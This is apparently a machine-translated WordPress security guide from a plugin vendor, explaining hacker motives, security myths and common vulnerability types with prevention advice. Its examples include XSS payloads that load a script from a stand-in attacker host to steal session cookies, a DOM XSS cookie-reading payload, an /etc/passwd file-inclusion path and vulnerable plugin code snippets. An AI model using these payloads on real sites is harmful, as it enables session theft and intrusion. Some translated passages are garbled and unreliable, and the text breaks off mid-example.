Безопасность WordPress: полное руководство

Безопасность WordPress может пугать, но это не обязательно. В этом всеобъемлющем руководстве по безопасности WordPress мы упростили основы защиты вашего веб-сайта WordPress, чтобы любой человек без технических знаний мог понять и защитить свой веб-сайт от хакерских атак.

Это руководство по безопасности WordPress разбито на 10 легко усваиваемых разделов. Каждый раздел проведет вас через определенный аспект безопасности WordPress. К концу руководства вы узнаете о различных типах уязвимостей, мотивах хакеров и о том, как защитить все, от вашего сервера до отдельных пользователей вашего веб-сайта WordPress.

Давайте нырнем!

Раздел 1. Безопасен ли WordPress?

WordPress безопасен? Короткий ответ: да.

Есть ли у WordPress проблемы с безопасностью?

Хотя WordPress сам по себе безопасен, чтобы избежать ошибок безопасности WordPress, от владельцев сайтов нужно приложить немного усилий. По правде говоря, самая большая проблема безопасности WordPress - это пользователи. Большинство взломов WordPress на платформе можно избежать, приложив немного усилий со стороны владельцев сайта.

Не волнуйтесь, мы позаботимся о вас. Это руководство научит вас всему, что вам нужно знать о защите вашего сайта.

Прежде чем мы сможем защитить наши веб-сайты, мы должны сначала понять пять вещей.

1. Почему хакеры атакуют сайты
2. Различные типы взломов WordPress
3. Определенные типы уязвимостей WordPress
4. Как предотвратить уязвимости WordPress
5. Как определить серьезность уязвимости

Зачем хакеру атаковать мой сайт?

Это распространенный вопрос безопасности WordPress, который вы можете задать, когда ваш худший кошмар начинает сбываться. Зачем хакеру атаковать мой сайт? Будьте уверены, шансы на то, что нападение будет личным, ничтожно мала. У хакеров есть скрытые мотивы, которые не имеют ничего общего с содержанием вашего сайта. Хакеров обычно не волнует, является ли ваш сайт благотворительной страницей для бездомных щенков или сайтом с множеством классных товаров для продажи.

Однако трудно не чувствовать себя мишенью, когда на ваш сайт взломана безликая личность, что привело к хаосу и неразберихе. Вы чувствуете стресс и как будто ситуация выходит из-под вашего контроля. Вы чувствуете себя атакованным и задаетесь вопросом, есть ли способ предотвратить нападение. Вы можете даже задаться вопросом, есть ли какие-нибудь спасения от обломков вашего веб-сайта.

Итак, что же заставляет хакера атаковать веб-сайт? Это не имеет никакого отношения к вашему веб-сайту, темам, которые он охватывает, или чему-то в этом роде. На самом деле хакеры нацелены на программное обеспечение, которое использует ваш веб-сайт, чтобы оставаться в рабочем состоянии. Взломав это программное обеспечение, они могут украсть конфиденциальные данные клиентов или даже взять под контроль ваш веб-сайт WordPress.

К сожалению, с ростом популярности WordPress также стал мишенью для хакеров. Если популярный плагин WordPress имеет серьезную уязвимость, хакер потенциально может захватить сотни тысяч, если не миллионы веб-сайтов. К счастью, большинство уязвимостей плагинов быстро исправляются их разработчиками.

Имея возможность получить конфиденциальную и личную информацию, хакеры могут затем продать ее для получения дохода или даже удержать выкуп за данные, по сути заставляя людей платить, чтобы вернуть свою информацию в надежные руки.

Итак, какова основная мотивация хакеров?

Создавать денежный поток для себя.

Интернет - прибыльное место, предлагающее всем слоям общества возможность получать прожиточный минимум. Однако это не означает, что все поступают так законно и моралистично. Хакеры получают высокую прибыль даже на самом маленьком веб-сайте.

Деньги - это единственная мотивация, в которой они нуждаются, но некоторым нравится ощущение силы, которое они получают, когда успешно взламывают веб-сайт, но подавляющее большинство из них занимается бизнесом исключительно ради денег.

Раздел 2: 5 основных мифов о безопасности WordPress развенчаны

Прежде чем мы перейдем к остальной части этого руководства по безопасности WordPress, давайте уделим минуту, чтобы развенчать некоторые мифы о безопасности WordPress.

В Интернете вы найдете множество советов по безопасности WordPress от людей, искренне желающих помочь. К сожалению, некоторые из этих советов основаны на мифах о безопасности WordPress и на самом деле не добавляют дополнительной безопасности вашему веб-сайту WordPress. Фактически, некоторые «советы» по безопасности WordPress могут увеличить вероятность того, что вы столкнетесь с проблемами и конфликтами.

У нас есть на выбор множество мифов о безопасности WordPress, но мы собираемся сосредоточиться только на 5 лучших, которые мы постоянно видели в более чем 30 000 обращениях в службу поддержки. Эти разговоры с нашими клиентами были использованы в качестве основы для следующих критериев для выбора основных мифов о безопасности WordPress:

1. Частота упоминания мифа.
2. Количество головных болей, вызванных мифом.
3. Ложное чувство безопасности, которое дает миф.

1. Вы должны скрыть свой URL-адрес / wp-admin или / wp-login (также известный как Hide Backend)

Идея сокрытия wp-admin заключается в том, что хакеры не могут взломать то, что не могут найти. Если ваш URL-адрес входа не является стандартным URL-адресом WordPress / wp-admin /, разве вы не защищены от атак грубой силы?

По правде говоря, большинство функций Hide Backend - это просто безопасность через неясность, что не является надежной стратегией безопасности WordPress. Хотя скрытие URL-адреса серверной части wp-admin может помочь смягчить некоторые атаки на ваш логин, этот подход не остановит их всех.

Мы часто получаем обращения в службу поддержки от людей, недоумевающих по поводу того, как iThemes Security Pro сообщает о недействительных попытках входа в систему, если они скрыли свой логин. Это потому, что есть и другие способы входа на ваши сайты WordPress, помимо использования браузера, например, использование XML-RPC или REST API. Не говоря уже о том, что после изменения URL-адреса для входа другой плагин или тема все еще может ссылаться на новый URL-адрес.

Фактически, функция Hide Backend ничего не меняет. Да, это не позволяет большинству пользователей напрямую обращаться к URL-адресу входа по умолчанию. Но после того, как кто-то вводит настраиваемый URL-адрес для входа, он перенаправляется обратно на URL-адрес для входа в WordPress по умолчанию.

Также известно, что настройка URL-адреса для входа вызывает конфликты. Есть некоторые плагины, темы или сторонние приложения, которые жестко кодируют wp-login.php в своей базе кода. Поэтому, когда жестко запрограммированная программа ищет yoursite.com/wp-login.php, вместо этого она обнаруживает ошибку.

2. Вы должны скрыть название вашей темы и номер версии WordPress.

Если вы используете инструменты разработчика своего браузера, вы можете довольно быстро увидеть название темы и номер версии WordPress, запущенные на сайте WordPress. Теория, лежащая в основе сокрытия названия вашей темы и версии WP, заключается в том, что если злоумышленники получат эту информацию, они смогут взломать ваш сайт.

Например, глядя на снимок экрана выше, вы можете увидеть, что этот сайт использует Twenty Twenty-One, а версия WordPress - 5.6.

Проблема с этим мифом о безопасности WordPress заключается в том, что за клавиатурой нет настоящего парня, который ищет идеальное сочетание темы и номера версии WordPress для атаки. Однако есть бездумные боты, которые ищут в Интернете известные уязвимости в реальном коде, запущенном на вашем веб-сайте, поэтому скрытие имени вашей темы и номера версии WP не защитит вас.

3. Вам следует переименовать каталог wp-content.

Каталог wp-content содержит ваши плагины, темы и папку для загрузки мультимедиа. Это масса хороших вещей и исполняемого кода в одном каталоге, поэтому понятно, что люди хотят проявлять инициативу и защищать эту папку.

К сожалению, это миф о безопасности WordPress, согласно которому изменение имени wp-content добавит дополнительный уровень безопасности сайту. Не будет. Мы можем легко найти имя вашего измененного каталога wp-content с помощью инструментов разработчика браузера. На скриншоте ниже мы видим, что я переименовал каталог содержимого этого сайта в / test /.

Изменение имени каталога не повысит безопасность вашего сайта, но может вызвать конфликты для плагинов, которые имеют жестко заданный путь к каталогу / wp-content /.

4. Мой сайт недостаточно велик, чтобы привлечь внимание хакеров.

Этот миф о безопасности WordPress оставляет множество сайтов уязвимыми для атак. Даже если вы являетесь владельцем крошечного сайта с низким трафиком, вам все равно важно проявлять инициативу в обеспечении безопасности своего сайта.

Даже если вы являетесь владельцем крошечного сайта с низким трафиком, вам все равно важно проявлять инициативу в обеспечении безопасности своего сайта.

На самом деле ваш сайт или бизнес не обязательно должны быть большими, чтобы привлечь внимание потенциального злоумышленника. Хакеры по-прежнему видят возможность использовать ваш сайт в качестве канала для перенаправления некоторых ваших посетителей на вредоносные сайты, рассылки спама с вашего почтового сервера, распространения вирусов или даже майнинга биткойнов. Они возьмут все, что смогут.

5. WordPress - небезопасная платформа

Самый разрушительный миф о безопасности WordPress заключается в том, что сам WordPress небезопасен. Это просто неправда. WordPress - самая популярная система управления контентом в мире, и она не добилась этого из-за несерьезного отношения к безопасности.

Раздел 3: Взломы WordPress и уязвимости WordPress

4 типа взлома WordPress

Когда дело доходит до понимания безопасности WordPress, важно понимать

1. SEO-спам

Еще одна мотивация для атаки хакера на ваш сайт - это получение преимуществ от SEO-спама. SEO или поисковая оптимизация - это то, что поисковые системы используют для индексации или ранжирования вашего сайта. Используя определенные ключевые слова, стратегически размещенные на ваших веб-страницах и в сообщениях в блогах, вы можете повысить рейтинг своего сайта в результатах поиска Google. Это привлечет трафик на ваш сайт и поможет вам получить прибыль, которая стоит вашего времени.

Хакеры знают все о SEO и используют это в своих интересах. Когда ваш сайт был взломан, хакеры установят на него бэкдор. Это позволяет им удаленно контролировать ваши ключевые слова и контент веб-сайта. Они часто перенаправляют трафик с вашего сайта, направляя его прямо на свой, полностью обходя ваш.

Это оставит вашу целевую аудиторию в замешательстве и разочаровании, разрушив репутацию и доверие к вашему сайту. Посетители вашего веб-сайта часто будут перенаправлены на сайты, которые явно являются мошенничеством, и не решатся повторно посетить ваш веб-сайт в будущем.

Как будто этого было недостаточно, хакеры, использующие такой подход, заставляют ваш сайт выглядеть плохо для поисковых систем, а не только для окружающих. Ваш веб-сайт больше не будет выглядеть легитимным, а его рейтинг быстро упадет. Без высокого рейтинга в поиске ваш сайт станет одним из миллионов, которые никогда не получают больше нескольких посещений в месяц.

2. Внедрение вредоносного ПО

Многие хакеры атакуют ваш сайт, намереваясь заразить его вредоносным ПО. Вредоносное ПО - это крошечные фрагменты кода, которые можно использовать для внесения вредоносных изменений на ваш сайт. Если ваш сайт заражен вредоносным ПО, важно получить уведомление как можно скорее.

Каждую минуту, когда вредоносное ПО остается на вашем сайте, оно наносит ему все больший ущерб. Чем больше ущерб нанесен вашему сайту, тем больше времени у вас уйдет на его очистку и восстановление. Очень важно проверять работоспособность вашего веб-сайта, регулярно сканируя его на наличие вредоносных программ. Вот почему так важно постоянно проверять работоспособность вашего веб-сайта, сканируя его на наличие вредоносных программ.

3. Программы-вымогатели

Хакер может захотеть атаковать ваш сайт, чтобы удержать его с целью получения выкупа. Программа-вымогатель - это когда хакер захватывает ваш сайт, и он не вернет его вам, если вы не заплатите ему огромную плату. Среднее время простоя при атаке программы-вымогателя составляет 9,5 дней. Какой доход вам обойдется в 10 дней БЕЗ продаж?

Средний размер выкупа, который запрашивают хакеры, резко вырос - с 294 долларов в 2015 году до более чем 13 000 долларов в 2020 году. С такими выплатами криминальный бизнес в Интернете не замедляется. По мере роста преступных сообществ становится все более и более важным обеспечение надлежащей защиты и защиты вашего веб-сайта.

4. Ущерб на веб-сайте

Некоторые хакеры могут атаковать ваш сайт ради забавы. Стиль взлома, который является менее злым по своей сути, - это стиль взлома веб-сайтов. Обычно это дети или молодые люди, которые только начинают экспериментировать со своими хакерскими навыками. Они делают подобные хаки, чтобы попрактиковаться и улучшить свои навыки.

Когда мы говорим о том, что веб-сайт был поврежден, подумайте о граффити. Злоумышленники полностью изменят внешний вид вашего сайта, иногда забавным или дурацким образом. Типичные взломщики веб-сайтов делают свои дела для развлечения или для того, чтобы выставить себя напоказ. Они часто публикуют фотографии своих проступков, пытаясь уравновесить друг друга, чтобы выиграть приз за лучшее извращение.

Хорошая новость в том, что эта форма взлома менее опасна для вас. Кроме того, поскольку дефейсы выполняют в основном подростки и другие хакеры-любители, их легче обнаружить и удалить с вашего веб-сайта по сравнению с другими формами вредоносного ПО. Обычно они могут быть обнаружены сканерами и быстро удалены.

Объяснение 21 распространенной уязвимости WordPress

К сожалению, уязвимости WordPress существуют. Уязвимости WordPress могут существовать в ваших плагинах, ваших темах и даже ядре WordPress. А поскольку WordPress сейчас поддерживает почти 40% всех веб-сайтов, задача выявления уязвимостей становится еще более важной. Проще говоря: вы должны внимательно следить за безопасностью своего сайта.

Если вы не являетесь экспертом по безопасности WordPress, понимание всех различных уязвимостей WordPress может быть сложной задачей. Также может оказаться непосильной задачей попытаться понять различные уровни серьезности уязвимости, а также риски, связанные с уязвимостью WordPress.

Это руководство определит 21 наиболее распространенную уязвимость WordPress, расскажет, как оценить серьезность уязвимости WordPress, даст примеры того, как хакер может использовать уязвимость, и покажет, как эти уязвимости можно предотвратить. Давайте погрузимся.

Что такое уязвимость WordPress?

Уязвимость WordPress - это слабое место или недостаток в теме, плагине или ядре WordPress, который может быть использован хакером. Другими словами, уязвимости WordPress создают точку входа, которую хакер может использовать для совершения вредоносных действий.

Имейте в виду, что взлом веб-сайтов почти полностью автоматизирован. Из-за этого хакеры могут легко взломать большое количество веб-сайтов практически в кратчайшие сроки. Хакеры используют специальные инструменты, которые сканируют Интернет в поисках известных уязвимостей.

Хакерам нравятся легкие цели, а наличие веб-сайта, на котором запущено программное обеспечение с известными уязвимостями, похоже на передачу хакеру пошаговых инструкций по взлому вашего веб-сайта WordPress, сервера, компьютера или любого другого устройства, подключенного к Интернету.

Наши ежемесячные сводные отчеты об уязвимостях WordPress охватывают все публично раскрытые уязвимости ядра WordPress, плагинов WordPress и тем. В этих обзорах мы сообщаем название уязвимого плагина или темы, уязвимые версии и тип уязвимости.

Что такое уязвимость нулевого дня?

Когда дело доходит до безопасности WordPress, важно понимать определение уязвимости нулевого дня. Поскольку уязвимость была раскрыта общественности, у разработчика есть нулевой день для исправления уязвимости. И это может иметь большие последствия для ваших плагинов и тем.

Обычно исследователь безопасности обнаруживает уязвимость и в частном порядке раскрывает уязвимость разработчикам компании, владеющим программным обеспечением. Исследователь безопасности и разработчик соглашаются, что полная информация будет опубликована после того, как патч станет доступным. После выпуска патча может произойти небольшая задержка в раскрытии уязвимости, чтобы дать большему количеству людей время для обновления основных уязвимостей системы безопасности.

Однако, если разработчик не отвечает исследователю безопасности или не может предоставить исправление для уязвимости, исследователь может публично раскрыть уязвимость, чтобы заставить разработчика выпустить исправление.

Публичное раскрытие уязвимости и кажущееся введение нулевого дня может показаться контрпродуктивным. Но это единственное средство, с помощью которого исследователь может оказать давление на разработчика, чтобы исправить уязвимость.

У Google Project Zero есть аналогичные рекомендации, когда дело доходит до раскрытия уязвимостей. Они публикуют полную информацию об уязвимости через 90 дней. Была ли исправлена ​​уязвимость.

Уязвимость может найти каждый. Если хакер обнаружит уязвимость до того, как разработчик выпустит исправление, это станет худшим кошмаром для конечного пользователя…. Активно эксплуатируемый нулевой день.

Что такое активно используемая уязвимость нулевого дня?

Активно используемая уязвимость нулевого дня - это именно то, на что это похоже. Это незащищенная уязвимость, которую хакеры нацеливают, атакуют и активно используют.

В конце 2018 года хакеры активно использовали серьезную уязвимость WordPress в плагине WP GDPR Compliance. Эксплойт позволял неавторизованным пользователям - подробнее об этом в следующем разделе - изменять параметры регистрации пользователей WP и изменять новую роль пользователя по умолчанию с подписчика на администратора.

Эти хакеры обнаружили эту уязвимость раньше, чем плагин WP GDPR Compliance и исследователи безопасности. Таким образом, любой веб-сайт, на котором был установлен этот плагин, был легкой и гарантированной маркой для киберпреступников.

Как защитить себя от уязвимости нулевого дня

Лучший способ защитить ваш сайт от уязвимости нулевого дня - это деактивировать и удалить программное обеспечение, пока уязвимость не будет исправлена. К счастью, разработчики плагина WP GDPR Compliance быстро отреагировали и выпустили исправление для уязвимости на следующий день после ее публичного раскрытия.

Неисправленные уязвимости делают ваш сайт легкой мишенью для хакеров.

Неаутентифицированные и аутентифицированные уязвимости WordPress

Есть еще два термина, с которыми вам нужно знать, когда речь идет об уязвимостях WordPress.

1. Без аутентификации - уязвимость WordPress, не прошедшая аутентификацию, означает, что любой может воспользоваться уязвимостью.
2. Аутентифицированный - уязвимость WordPress, прошедшая аутентификацию, означает, что для ее использования требуется авторизованный пользователь.

Уязвимость, для которой требуется аутентифицированный пользователь, намного сложнее использовать хакеру, особенно если для этого требуются привилегии уровня администратора. И, если у хакера уже есть набор учетных данных администратора, ему действительно не нужно использовать уязвимость, чтобы нанести ущерб.

Есть один нюанс. Для использования некоторых проверенных уязвимостей требуются только возможности уровня подписчика. Если ваш веб-сайт позволяет кому угодно регистрироваться, на самом деле нет большой разницы между этой уязвимостью и неаутентифицированной уязвимостью.

Что касается уязвимостей WordPress, существует 21 распространенный тип уязвимостей. Давайте рассмотрим каждый из этих типов уязвимостей WordPress.

1. Обход аутентификации

Уязвимость Authentication Bypass позволяет злоумышленнику пропустить требования аутентификации и выполнять задачи, обычно зарезервированные для аутентифицированных пользователей.

Аутентификация - это процесс проверки личности пользователя. WordPress требует, чтобы пользователи вводили имя пользователя и пароль для подтверждения своей личности.

Пример обхода аутентификации

Приложения проверяют аутентификацию на основе фиксированного набора параметров. Злоумышленник может изменить эти параметры, чтобы получить доступ к веб-страницам, которые обычно требуют аутентификации.

Очень простой пример чего-то вроде этого - параметр аутентификации в URL-адресе.

 https:/my-website/some-plugint?param=authenticated&param=no

Указанный выше URL-адрес имеет параметр аутентификации со значением no. Поэтому, когда мы посещаем эту страницу, нам будет представлено сообщение, информирующее нас о том, что мы не уполномочены просматривать информацию на этой странице.

Однако, если проверка аутентификации была плохо закодирована, злоумышленник мог изменить параметр аутентификации, чтобы получить доступ к частной странице.

 https:/my-website/some-plugint?param=authenticated&param=yes

В этом примере хакер может изменить значение аутентификации в URL-адресе на yes, чтобы обойти требование аутентификации для просмотра страницы.

Как предотвратить предотвращение обхода аутентификации

Вы можете защитить свой веб-сайт от уязвимостей сломанной аутентификации, используя двухфакторную аутентификацию.

2. Уязвимость бэкдора

Уязвимость Backdoor позволяет как авторизованным, так и неавторизованным пользователям обойти обычные меры безопасности WordPress и получить высокоуровневый доступ к компьютеру, серверу, веб-сайту или приложению.

Пример бэкдора

Разработчик создает бэкдор, чтобы он мог быстро переключаться между кодированием и тестированием кода в качестве пользователя-администратора. К сожалению, разработчик забывает удалить бэкдор до того, как программное обеспечение станет общедоступным.

Если хакер обнаружит бэкдор, он может использовать точку входа, чтобы получить доступ администратора к программному обеспечению. Теперь, когда у хакеров есть права администратора, они могут совершать всевозможные вредоносные действия, такие как внедрение вредоносных программ или кража конфиденциальных данных.

Как предотвратить бэкдор

Многие бэкдоры можно свести к одной проблеме - неправильной настройке безопасности. Проблемы неправильной настройки безопасности WordPress можно уменьшить, удалив все неиспользуемые функции в коде, обновив все библиотеки и сделав сообщения об ошибках более общими.

3. Уязвимость PHP, связанная с внедрением объектов

Уязвимость PHP Object-Injection возникает, когда пользователь отправляет ввод, который не очищен (то есть недопустимые символы не удаляются) перед передачей в функцию unserialized() PHP.

Пример внедрения объекта PHP

Вот реальный пример уязвимости PHP Object-Injection в плагине Sample Ads Manager WordPress, о которой первоначально сообщил sumofpwn.

Проблема связана с двумя небезопасными вызовами unserialize () в файле плагинов sam-ajax-loader.php . Входные данные принимаются непосредственно из запроса POST, как показано в приведенном ниже коде.

 if ( in_array( $action, $allowed_actions ) ) { switch ( $action ) { case 'sam_ajax_load_place': echo json_encode( array( 'success' => false, 'error' => 'Deprecated...' ) ); break; case 'sam_ajax_load_ads': if ( ( isset( $_POST['ads'] ) && is_array( $_POST['ads'] ) ) && isset( $_POST['wc'] ) ) { $clauses = **unserialize( base64_decode( $_POST['wc'] ) )**;

Эта проблема может привести к тому, что злоумышленник введет и выполнит вредоносный код.

Как предотвратить внедрение объектов PHP

Не используйте функцию unserialize() с вводом, вводимым пользователем, вместо этого используйте функции JSON.

4. Уязвимость межсайтового скриптинга

Уязвимость XSS или межсайтового скриптинга возникает, когда веб-приложение позволяет пользователям добавлять собственный код в путь URL. Злоумышленник может использовать уязвимость, чтобы запустить вредоносный код в веб-браузере жертвы, создать перенаправление на вредоносный веб-сайт или захватить сеанс пользователя.

Отражено три основных типа XSS. хранится и на основе DOM

5. Отраженная уязвимость межсайтового скриптинга

Отраженный XSS или Отраженный межсайтовый сценарий происходит, когда вредоносный сценарий отправляется в клиентском запросе - запросе, сделанном вами в браузере - на сервер, затем отражается сервером и выполняется вашим браузером.

Пример отраженного межсайтового скриптинга

Допустим, yourfavesite.com требует, чтобы вы вошли в систему, чтобы просмотреть часть содержимого веб-сайта. Допустим, этот веб-сайт не может правильно кодировать вводимые пользователем данные.

Злоумышленник может воспользоваться этой уязвимостью, создав вредоносную ссылку и yourfavesite.com ею с пользователями yourfavesite.com в электронных письмах и сообщениях в социальных сетях.

Злоумышленник использует инструмент сокращения URL-адресов, чтобы вредоносная ссылка выглядела yourfavesite.com/cool-stuff и очень интерактивной, yourfavesite.com/cool-stuff . Но когда вы щелкаете сокращенную ссылку, ваш браузер yourfavesite.com/cool-stuff?q=cool-stuff<\script&src=”http://bad-guys.com/passwordstealingcode.js полную ссылку yourfavesite.com/cool-stuff?q=cool-stuff<\script&src=”http://bad-guys.com/passwordstealingcode.js .

После нажатия на ссылку вы yourfavesite.com на yourfavesite.com , и вредоносный сценарий будет отражен в вашем браузере, позволяя злоумышленнику захватить ваши сеансовые куки и yourfavesite.com запись yourfavesite.com .

Как предотвратить отражение межсайтовых скриптов

Правило № 5 в шпаргалке по предотвращению кросс-скриптинга OWASP - кодирование URL перед вставкой ненадежных данных в значения параметров URL-адреса HTML. Это правило может помочь предотвратить создание отраженной уязвимости XSS при добавлении ненадежных данных в значение параметра HTTP GET.

<a href="http://www.yourfavesite.com?test=...ENCODE UNTRUSTED DATA BEFORE PUTTING HERE...">link</a >

6. Сохраняемая уязвимость межсайтового скриптинга.

Уязвимость Stored XSS или Stored Cross-Site Scripting позволяет хакерам внедрить вредоносный код и сохранить его на сервере веб-приложения.

Пример сохраненного межсайтового сценария

Злоумышленник обнаруживает, что yourfavesite.com позволяет посетителям вставлять HTML-теги в раздел комментариев сайта. Итак, злоумышленник создает новый комментарий:

Отличная статья! Ознакомьтесь с другой отличной статьей по <script src=”http://bad-guys.com/passwordstealingcode.js> . </script>

Примечание. Для выполнения отраженной уязвимости XSS посетитель должен щелкнуть ссылку вредоносного кода. Сохраненная XSS- атака требует только посещения страницы, содержащей комментарий. Вредоносный код запускается при каждой загрузке страницы.

Теперь, когда наш плохой парень добавил комментарий, каждый будущий посетитель этой страницы будет подвержен их вредоносному сценарию. Скрипт размещен на веб-сайте yourfavesite.com и yourfavesite.com захватывать файлы cookie сеанса посетителей и yourfavesite.com записи yourfavesite.com .

Как предотвратить сохраненные межсайтовые сценарии

Правило № 1 в шпаргалке по предотвращению кросс-сценариев OWASP - это кодирование HTML перед добавлением ненадежных данных в элементы HTML.

 <body> ...ENCODE UNTRUSTED DATA BEFORE PUTTING HERE... </body>

 <div> ...ENCODE UNTRUSTED DATA BEFORE PUTTING HERE... </div>

Кодирование следующих символов для предотвращения переключения в любой контекст выполнения, такой как сценарий, стиль или обработчики событий. В спецификации рекомендуется использовать шестнадцатеричные сущности.

 & --> &amp; < --> &lt; > --> &gt; " --> &quot; ' --> &#x27;

7. Уязвимость межсайтового скриптинга на основе объектной модели документа

Уязвимость межсайтового скриптинга на основе DOM или объектной модели документа возникает, когда клиентский сценарий веб-сайта записывает предоставленные пользователем данные в объектную модель документа (DOM). Затем веб-сайт считывает дату пользователя из DOM и выводит его в веб-браузер посетителя.

Если данные, предоставленные пользователем, не обрабатываются должным образом, злоумышленник может внедрить вредоносный код, который будет выполняться, когда веб-сайт считывает код из DOM.

Примечание. Отраженный и сохраненный XSS - это проблемы на стороне сервера, в то время как XSS на основе DOM - проблема клиента (браузера).

Пример межсайтового скриптинга на основе объектной модели документа

Распространенный способ объяснить атаку DOM XSS - это настраиваемая страница приветствия. После создания учетной записи, предположим, что yourfavesite.com вы перенаправляетесь на страницу приветствия, настроенную так, чтобы приветствовать вас по имени, используя приведенный ниже код. И имя пользователя закодировано в URL-адресе.

 <HTML> <TITLE>Welcome!</TITLE> Hi <SCRIPT> var pos=document.URL.indexOf("name=")+8; document.write(document.URL.substring(pos,document.URL.length)); </SCRIPT> <BR> Welcome to yourfavesite.com! … </HTML>

Итак, у нас будет URL yourfavesite.com/account?name=yourname .

Злоумышленник может выполнить XSS-атаку на основе DOM, отправив новому пользователю следующий URL-адрес:

 http://yourfavesite.com/account?name=<script>alert(document.cookie)</script>

Когда новый пользователь щелкает ссылку, его браузер отправляет запрос:

 /account?name=<script>alert(document.cookie)</script>

на bad-guys.com . Веб-сайт отвечает страницей, содержащей указанный выше код Javascript.

Браузер нового пользователя создает объект DOM для страницы, в котором объект document.location содержит строку:

 http://www.bad-guys.com/account?name=<script>alert(document.cookie)</script>

Исходный код на странице не предполагает, что параметр по умолчанию будет содержать разметку HTML, повторяя разметку на странице. Затем браузер нового пользователя отобразит страницу и выполнит сценарий злоумышленника:

 alert(document.cookie)

Как предотвратить межсайтовый скриптинг на основе DOM

Правило № 1 в шпаргалке по предотвращению межсайтовых сценариев на основе OWASP Dom - уход от HTML. Затем JS ускользает перед добавлением ненадежных данных в подконтекст HTML в контексте выполнения.

Пример опасных методов HTML:

Атрибуты

 element.innerHTML = "<HTML> Tags and markup"; element.outerHTML = "<HTML> Tags and markup";

Методы

 document.write("<HTML> Tags and markup"); document.writeln("<HTML> Tags and markup");

Чтобы сделать динамические обновления HTML в безопасном DOM, OWASP рекомендует:

1. Кодировка HTML, а затем
2. JavaScript кодирует весь ненадежный ввод, как показано в этих примерах:

 element.innerHTML = "<%=Encoder.encodeForJS(Encoder.encodeForHTML(untrustedData))%>"; element.outerHTML = "<%=Encoder.encodeForJS(Encoder.encodeForHTML(untrustedData))%>";

 document.write("<%=Encoder.encodeForJS(Encoder.encodeForHTML(untrustedData))%>"); document.writeln("<%=Encoder.encodeForJS(Encoder.encodeForHTML(untrustedData))%>");

8. Уязвимость подделки межсайтовых запросов

Уязвимость CSRF или подделки межсайтовых запросов возникает, когда киберпреступник вынуждает пользователя выполнить непреднамеренные действия. Злоумышленник подделывает запрос пользователя к приложению.

Пример подделки межсайтового запроса

В нашем обзоре уязвимостей WordPress за январь 2020 года мы сообщили об уязвимости подделки межсайтовых запросов, обнаруженной в плагине Code Snippets. (Плагин был быстро исправлен в версии 2.14.0)

Отсутствие в плагине защиты CRSF позволило любому подделать запрос от имени администратора и внедрить исполняемый код на уязвимый сайт. Злоумышленник мог воспользоваться этой уязвимостью для выполнения вредоносного кода и даже полного захвата сайта.

Как предотвратить подделку межсайтовых запросов

Большинство фреймворков кодирования имеют встроенные средства защиты от синхронизированных токенов для защиты от CSRF, и их следует использовать.

Существуют также внешние компоненты, такие как проект CSRF Protector, которые можно использовать для защиты уязвимостей PHP и Apache CSRF.

9. Уязвимость подделки запросов на стороне сервера

Уязвимость SSRF или Server-Site Request Forger позволяет злоумышленнику обмануть серверное приложение, чтобы сделать HTTP-запросы к произвольному домену по своему выбору.

Пример подделки запроса на стороне сервера

Уязвимость SSRF может быть использована для проведения атаки Reflected Cross-Site Scripting. Злоумышленник может получить вредоносный сценарий с сайта bad-guys.com и передать его всем посетителям веб-сайта.

Как предотвратить подделку запросов на стороне сервера

Первым шагом к снижению уязвимостей SSRF является проверка входных данных. Например, если ваш сервер использует предоставленные пользователем URL-адреса для получения различных файлов, вам следует проверить URL-адрес и разрешить только целевые хосты, которым вы доверяете.

Для получения дополнительной информации о предотвращении SSRF ознакомьтесь со шпаргалкой по OWASP.

10. Уязвимость, связанная с повышением привилегий

Привилегия Эскалация уязвимость позволяет злоумышленнику выполнять задачи , которые обычно требуют привилегий высшего уровня.

Пример повышения привилегий

В нашем обзоре уязвимостей WordPress за ноябрь 2020 года мы сообщили об уязвимости повышения привилегий, обнаруженной в плагине Ultimate Member (уязвимость была исправлена ​​в версии 2.1.12).

Злоумышленник может предоставить параметр массива для wp_capabilities которые определяют роль пользователя. Во время процесса регистрации представленные регистрационные данные были переданы функции update_profile , и любые соответствующие метаданные, которые были отправлены, независимо от того, что было отправлено, будут обновлены для этого нового зарегистрированного пользователя.

По сути, уязвимость позволяла новому пользователю запросить администратора при регистрации.

Как предотвратить повышение привилегий

iThemes Security Pro может помочь защитить ваш сайт от нарушения контроля доступа, ограничив доступ администратора к списку доверенных устройств.

11. Уязвимость удаленного выполнения кода

Уязвимость RCE или удаленного выполнения кода позволяет злоумышленнику получить доступ, внести изменения и даже захватить компьютер или сервер.

Пример удаленного выполнения кода

В 2018 году Microsoft раскрыла уязвимость удаленного выполнения кода, обнаруженную в Excel.

Злоумышленник, успешно воспользовавшийся уязвимостью, может запустить произвольный код в контексте текущего пользователя. Если текущий пользователь вошел в систему с правами администратора, злоумышленник может получить контроль над уязвимой системой. После этого злоумышленник может установить программы; просматривать, изменять или удалять данные; или создайте новые учетные записи с полными правами пользователя. Пользователи, чьи учетные записи настроены на меньшее количество прав в системе, могут пострадать в меньшей степени, чем пользователи, которые работают с правами администратора.

Как предотвратить удаленное выполнение кода

Самый простой способ уменьшить уязвимость RCE - проверить вводимые пользователем данные путем фильтрации и удаления любых нежелательных символов.

У нашей материнской компании Liquid Web есть отличная статья о предотвращении удаленного выполнения кода.

14. Уязвимость, связанная с подключением файлов

Уязвимость включения файлов возникает, когда веб-приложение позволяет пользователю отправлять данные в файлы или загружать файлы на сервер.

Существует два типа уязвимостей, связанных с включением файлов: локальные и удаленные.

15. Уязвимость, связанная с включением локальных файлов.

Уязвимость LFI или включения локального файла позволяет злоумышленнику читать и иногда выполнять файлы на сервере веб-сайта.

Пример включения локального файла

Давайте еще раз посмотрим на yourfavesite.com , где пути, переданные для include операторов, не yourfavesite.com должным образом. Например, давайте взглянем на URL-адрес ниже.

 yourfavesite.com/module.php?file=example.file

Злоумышленник может изменить параметр URL для доступа к произвольному файлу на сервере.

 yourfavesite.com/module.php?file=etc/passwd

Изменение значения файла в URL-адресе может позволить злоумышленнику просмотреть содержимое файла psswd.

Как предотвратить включение локального файла

Создайте разрешенный список файлов, которые может включать страница, а затем используйте идентификатор для доступа к выбранному файлу. А затем заблокируйте любой запрос, содержащий недопустимый идентификатор.

16. Уязвимость удаленного включения файлов

Уязвимость RFI или удаленного включения файла позволяет злоумышленнику включить файл, обычно используя механизмы «динамического включения файлов», реализованные в целевом приложении.

Пример включения удаленного файла

Плагин WordPress WP со Spritz был закрыт в репозитории WordPress.org из-за уязвимости RFI.

Ниже представлен исходный код уязвимости:

 if(isset($_GET['url'])){ $content=file_get_contents($_GET['url']);

Код можно использовать, изменив значение content.filter.php?url= value. Например:

